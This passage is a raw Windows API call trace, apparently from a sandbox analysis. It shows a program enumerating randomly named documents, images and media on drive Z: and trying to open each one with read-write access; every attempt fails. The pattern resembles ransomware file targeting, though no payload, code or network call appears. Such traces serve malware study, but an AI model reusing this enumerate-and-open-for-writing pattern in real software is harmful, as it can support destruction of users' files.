FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8fe9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iN0JFI.xlsx", cAlternateFileName="")) returned 1 [0182.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.611] PathFindExtensionW (pszPath="Z:\\iN0JFI.xlsx") returned=".xlsx" [0182.615] CreateFileW (lpFileName="Z:\\iN0JFI.xlsx" (normalized: "z:\\in0jfi.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.616] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8d4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pbmjHxBll.rtf", cAlternateFileName="")) returned 1 [0182.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.616] PathFindExtensionW (pszPath="Z:\\pbmjHxBll.rtf") returned=".rtf" [0182.620] CreateFileW (lpFileName="Z:\\pbmjHxBll.rtf" (normalized: "z:\\pbmjhxbll.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.621] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x54ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2xLvx0ttbb57lMVLO.ods", cAlternateFileName="")) returned 1 [0182.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.621] PathFindExtensionW (pszPath="Z:\\2xLvx0ttbb57lMVLO.ods") returned=".ods" [0182.624] CreateFileW (lpFileName="Z:\\2xLvx0ttbb57lMVLO.ods" (normalized: "z:\\2xlvx0ttbb57lmvlo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.625] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18602, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iRSv1LGGODPvwvEebQE.png", cAlternateFileName="")) returned 1 [0182.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.625] PathFindExtensionW (pszPath="Z:\\iRSv1LGGODPvwvEebQE.png") returned=".png" [0182.629] CreateFileW (lpFileName="Z:\\iRSv1LGGODPvwvEebQE.png" (normalized: "z:\\irsv1lggodpvwveebqe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.630] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1571a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AbOnaFU.xlsx", cAlternateFileName="")) returned 1 [0182.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.630] PathFindExtensionW (pszPath="Z:\\AbOnaFU.xlsx") returned=".xlsx" [0182.633] CreateFileW (lpFileName="Z:\\AbOnaFU.xlsx" (normalized: "z:\\abonafu.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.634] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xce67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nFDzD.png", cAlternateFileName="")) returned 1 [0182.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.634] PathFindExtensionW (pszPath="Z:\\nFDzD.png") returned=".png" [0182.638] CreateFileW (lpFileName="Z:\\nFDzD.png" (normalized: "z:\\nfdzd.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.639] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15e55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSbSJ2ohxP3n6KDx.docx", cAlternateFileName="")) returned 1 [0182.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.639] PathFindExtensionW (pszPath="Z:\\TSbSJ2ohxP3n6KDx.docx") returned=".docx" [0182.642] CreateFileW (lpFileName="Z:\\TSbSJ2ohxP3n6KDx.docx" (normalized: "z:\\tsbsj2ohxp3n6kdx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.643] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10a4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0EiP8svF6n.mkv", cAlternateFileName="")) returned 1 [0182.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.644] PathFindExtensionW (pszPath="Z:\\0EiP8svF6n.mkv") returned=".mkv" [0182.647] CreateFileW (lpFileName="Z:\\0EiP8svF6n.mkv" (normalized: "z:\\0eip8svf6n.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.648] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc4ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RS5pLVkA29znz.flv", cAlternateFileName="")) returned 1 [0182.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.648] PathFindExtensionW (pszPath="Z:\\RS5pLVkA29znz.flv") returned=".flv" [0182.652] CreateFileW (lpFileName="Z:\\RS5pLVkA29znz.flv" (normalized: "z:\\rs5plvka29znz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.653] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1683c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sYQ0h.ppt", cAlternateFileName="")) returned 1 [0182.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.653] PathFindExtensionW (pszPath="Z:\\sYQ0h.ppt") returned=".ppt" [0182.659] CreateFileW (lpFileName="Z:\\sYQ0h.ppt" (normalized: "z:\\syq0h.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.661] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5e17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wucW1wawWx4ne.doc", cAlternateFileName="")) returned 1 [0182.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.661] PathFindExtensionW (pszPath="Z:\\wucW1wawWx4ne.doc") returned=".doc" [0182.665] CreateFileW (lpFileName="Z:\\wucW1wawWx4ne.doc" (normalized: "z:\\wucw1wawwx4ne.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.666] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14d3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eiiY7fvtLx3dj.bmp", cAlternateFileName="")) returned 1 [0182.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.666] PathFindExtensionW (pszPath="Z:\\eiiY7fvtLx3dj.bmp") returned=".bmp" [0182.670] CreateFileW (lpFileName="Z:\\eiiY7fvtLx3dj.bmp" (normalized: "z:\\eiiy7fvtlx3dj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.672] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x92e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1AikB2DT.mp3", cAlternateFileName="")) returned 1 [0182.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.672] PathFindExtensionW (pszPath="Z:\\1AikB2DT.mp3") returned=".mp3" [0182.676] CreateFileW (lpFileName="Z:\\1AikB2DT.mp3" (normalized: "z:\\1aikb2dt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.677] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x121c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WmEY4gv.mp3", cAlternateFileName="")) returned 1 [0182.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.677] PathFindExtensionW (pszPath="Z:\\WmEY4gv.mp3") returned=".mp3" [0182.681] CreateFileW (lpFileName="Z:\\WmEY4gv.mp3" (normalized: "z:\\wmey4gv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.683] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8MxVvSu2W.gif", cAlternateFileName="")) returned 1 [0182.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.683] PathFindExtensionW (pszPath="Z:\\8MxVvSu2W.gif") returned=".gif" [0182.687] CreateFileW (lpFileName="Z:\\8MxVvSu2W.gif" (normalized: "z:\\8mxvvsu2w.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.688] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15140, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8iKtd3z.mp3", cAlternateFileName="")) returned 1 [0182.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.688] PathFindExtensionW (pszPath="Z:\\8iKtd3z.mp3") returned=".mp3" [0182.692] CreateFileW (lpFileName="Z:\\8iKtd3z.mp3" (normalized: "z:\\8iktd3z.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.693] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16666, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cOTqEVjblHM.odt", cAlternateFileName="")) returned 1 [0182.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.693] PathFindExtensionW (pszPath="Z:\\cOTqEVjblHM.odt") returned=".odt" [0182.698] CreateFileW (lpFileName="Z:\\cOTqEVjblHM.odt" (normalized: "z:\\cotqevjblhm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.699] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GhhNZic0YcS.png", cAlternateFileName="")) returned 1 [0182.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.699] PathFindExtensionW (pszPath="Z:\\GhhNZic0YcS.png") returned=".png" [0182.703] CreateFileW (lpFileName="Z:\\GhhNZic0YcS.png" (normalized: "z:\\ghhnzic0ycs.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.704] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2AX71T.jpg", cAlternateFileName="")) returned 1 [0182.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.704] PathFindExtensionW (pszPath="Z:\\2AX71T.jpg") returned=".jpg" [0182.708] CreateFileW (lpFileName="Z:\\2AX71T.jpg" (normalized: "z:\\2ax71t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.709] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xec1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05s7FICPdDH4QU4JQ.pptx", cAlternateFileName="")) returned 1 [0182.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.709] PathFindExtensionW (pszPath="Z:\\05s7FICPdDH4QU4JQ.pptx") returned=".pptx" [0182.713] CreateFileW (lpFileName="Z:\\05s7FICPdDH4QU4JQ.pptx" (normalized: "z:\\05s7ficpddh4qu4jq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.714] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BcxN84fCWe8tEtN.mp3", cAlternateFileName="")) returned 1 [0182.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.714] PathFindExtensionW (pszPath="Z:\\BcxN84fCWe8tEtN.mp3") returned=".mp3" [0182.718] CreateFileW (lpFileName="Z:\\BcxN84fCWe8tEtN.mp3" (normalized: "z:\\bcxn84fcwe8tetn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.719] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11abe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3fGbugRdy.doc", cAlternateFileName="")) returned 1 [0182.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.719] PathFindExtensionW (pszPath="Z:\\3fGbugRdy.doc") returned=".doc" [0182.723] CreateFileW (lpFileName="Z:\\3fGbugRdy.doc" (normalized: "z:\\3fgbugrdy.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa150, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U04chup9Htp9GaipvVKU.mp3", cAlternateFileName="")) returned 1 